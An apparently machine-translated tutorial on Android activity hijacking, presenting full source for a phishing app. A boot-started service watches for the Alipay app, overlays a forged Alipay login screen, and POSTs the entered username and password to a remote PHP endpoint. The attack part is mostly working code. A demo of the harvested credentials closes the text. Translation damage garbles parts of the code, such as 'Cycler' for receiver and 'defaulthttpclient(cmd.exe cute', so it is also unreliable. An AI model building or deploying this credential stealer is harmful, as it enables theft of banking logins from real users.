1. Introduction to activity hijacking
See the original article published on the DEFCON-19
Https://www.trustwave.com/spiderlabs/advisories/TWSL2011-008.txt
When android is running, it will switch between multiple activities. It maintains the history stack of an activity and is used to restore the previous activity when the user clicks back, the stack top points to the currently displayed activity.
The original article is as follows:
Http://developer.android.com/guide/topics/fundamentals/tasks-and-back-stack.html
When we use intent to enable activity, intent has an option FLAG_ACTIVITY_NEW_TASK, which can make this activity at the top of the stack.
Http://developer.android.com/reference/android/content/Intent.html#FLAG_ACTIVITY_NEW_TASK
If we register a handler, we will respond to android. intent. action. BOOT_COMPLETED enables start of a service. This service starts a timer and constantly enumerates whether a preset process is started in the current process. If any preset process is found, use FLAG_ACTIVITY_NEW_TASK to start your phishing interface and intercept the logon credential of a normal application.
Ii. Instances
Androidmanifest. xml
<? Xml version = "1.0" encoding = "UTF-8"?>
<Manifest xmlns: android = "http://schemas.android.com/apk/res/android"
Package = "com. xiaod. Hijack"
Android: versionCode = "1"
Android: versionName = "1.0" type = "codeph" text = "/codeph">
<Uses-sdk android: minSdkVersion = "3"/>
<Uses-permission android: name = "android. permission. RECEIVE_BOOT_COMPLETED"> </uses-permission>
<Uses-permission android: name = "android. permission. INTERNET"/>
<Application android: icon = "@ drawable/icon" android: label = "@ string/app_name" android: name = ". HijackApplication">
<Activity android: name = ". HijackActivity"
Android: label = "@ string/app_name">
<Intent-filter>
<Action android: name = "android. intent. action. MAIN"/>
<Category android: name = "android. intent. category. LAUNCHER"/>
</Intent-filter>
</Activity>
<Activity android: name = ". AlipayLogin" android: noHistory = "true" android: windowSoftInputMode = "adjustResize"/>
<Service android: name = ". HijackService" android: label = "Hijack Service">
<Intent-filter>
<Action android: name = "com. xiaod. Hijack. service. Hijack"/>
</Intent-filter>
</Service>
<Cycler
Android: name = ". HijackReceiver"
Android: enabled = "true"
Android: exported = "true"
Android: label = "Hijack Cycler">
<Intent-filter>
<Action android: name = "android. intent. action. BOOT_COMPLETED"/>
</Intent-filter>
</Cycler>
</Application>
</Manifest>
Hijackcycler. java is used to start HijackService at startup.
Package com. xiaod. Hijack;
Import android. content. BroadcastReceiver;
Import android. content. Context;
Import android. content. Intent;
Import android. util. Log;
Public class HijackReceiver extends BroadcastReceiver {
@ Override
Public void onReceive (Context context, Intent intent ){
If (intent. getAction (). equals ("android. intent. action. BOOT_COMPLETED ")){
Intent serviceIntent = new Intent (context, HijackService. class );
Context. startService (serviceIntent );
}
}
}
HijackService. java is used to determine whether a normal application is started. If it is started, the hijacking activity is enabled.
Package com. xiaod. Hijack;
Import java. util. HashMap;
Import java. util. List;
Import java. util. Timer;
Import java. util. TimerTask;
Import android. app. ActivityManager;
Import android. app. ActivityManager. RunningAppProcessInfo;
Import android. app. Service;
Import android. content. Context;
Import android. content. Intent;
Import android. OS. IBinder;
Import android. util. Log;
Public class HijackService extends Service {
Timer mTimer = new Timer ();
// Create a scheduled task
TimerTask mTimerTask = new TimerTask (){
@ Override
Public void run (){
// TODO Auto-generated method stub
// Obtain the list of processes currently running
ActivityManager activityManager = (ActivityManager) getSystemService (Context. ACTIVITY_SERVICE );
List <RunningAppProcessInfo> appProcesses = activityManager. getRunningAppProcesses ();
// Enumeration process
For (RunningAppProcessInfo appProcess: appProcesses ){
// If the APP is on the frontend
If (appProcess. importance = RunningAppProcessInfo. IMPORTANCE_FOREGROUND ){
// Whether the APP is in the list to be hijacked
If (mVictims. containsKey (appProcess. processName )){
If (HijackApplication) getApplication (). getHasHijackStart () = false)
{
Intent dialogIntent = new Intent (getBaseContext (), mVictims. get (appProcess. processName ));
// Set the started activity to be at the top of the stack.
DialogIntent. addFlags (Intent. FLAG_ACTIVITY_NEW_TASK );
GetApplication (). startActivity (dialogIntent );
(HijackApplication) getApplication (). setHasHijackStart (true );
}
}
}
}
Log. e ("HijackService_TimerTask", "here ");
}
};
HashMap <String, Class <?> MVictims = new HashMap <String, Class <?> ();
Long delay = 1000;
Long period = 1000;
@ Override
Public void onStart (Intent intent, int startid ){
// Set the application to be hijacked
MVictims. put ("com. eg. android. AlipayGphone", AlipayLogin. class );
// Enable the timing task
MTimer. scheduleAtFixedRate (mTimerTask, delay, period );
}
@ Override
Public IBinder onBind (Intent arg0 ){
// TODO Auto-generated method stub
Return null;
}
}
AlipayLogin. java is a forged interface used to obtain user creden and send them to the specified address.
Package com. xiaod. Hijack;
Import java. util. ArrayList;
Import java. util. List;
Import org. apache. http. HttpResponse;
Import org. apache. http. NameValuePair;
Import org. apache. http. client. entity. UrlEncodedFormEntity;
Import org. apache. http. client. methods. HttpPost;
Import org. apache. http. impl. client. DefaultHttpClient;
Import org. apache. http. message. BasicNameValuePair;
Import org. apache. http. protocol. HTTP;
Import android. app. Activity;
Import android. OS. Bundle;
Import android. view. View;
Import android. view. View. OnClickListener;
Import android. view. Window;
Import android. widget. Button;
Import android. widget. EditText;
Public class AlipayLogin extends Activity {
Private Button mBtnLogin;
Private Button mBtnReg;
Private EditText mEdtUser;
Private EditText mEdtPwd;
@ Override
Public void onCreate (Bundle savedInstanceState ){
Super. onCreate (savedInstanceState );
RequestWindowFeature (Window. FEATURE_NO_TITLE );
SetContentView (R. layout. alipay_login );
MBtnLogin = (Button) findViewById (R. id. btn_login );
MBtnReg = (Button) findViewById (R. id. btn_reg );
MEdtUser = (EditText) findViewById (R. id. et_user );
MEdtPwd = (EditText) findViewById (R. id. et_pwd );
MBtnLogin. setOnClickListener (new OnClickListener (){
@ Override
Public void onClick (View v ){
// TODO Auto-generated method stub
SendInfo (mEdtUser. getText (). toString (), mEdtPwd. getText (). toString ());
MoveTaskToBack (true );
}
});
MBtnReg. setOnClickListener (new OnClickListener (){
@ Override
Public void onClick (View v ){
// TODO Auto-generated method stub
SendInfo (mEdtUser. getText (). toString (), mEdtPwd. getText (). toString ());
MoveTaskToBack (true );
}
});
}
Public void onBackPressed (){
MoveTaskToBack (true );
}
Private boolean sendInfo (String user, String pwd ){
HttpPost request = new HttpPost ("http://www.sectop.com/Hijack.php ");
List <NameValuePair> params = new ArrayList <NameValuePair> ();
Params. add (new BasicNameValuePair ("user", user ));
Params. add (new BasicNameValuePair ("pwd", pwd ));
Try {
Request. setEntity (new UrlEncodedFormEntity (params, HTTP. UTF_8 ));
HttpResponse response = new defaulthttpclient(cmd.exe cute (request );
If (response. getStatusLine (). getStatusCode () = 200 ){
Return true;
}
Else {
Return false;
}
} Catch (Exception e ){
}
Return false;
}
}
The demo is as follows:
Start a normal application
At this time, the malicious background service starts a forged activity.
After the user enters the credential
Malicious activity records the credential and jumps back to the normal application
User creden have been recorded on the remote server
From http://www.sectop.com /? P = 242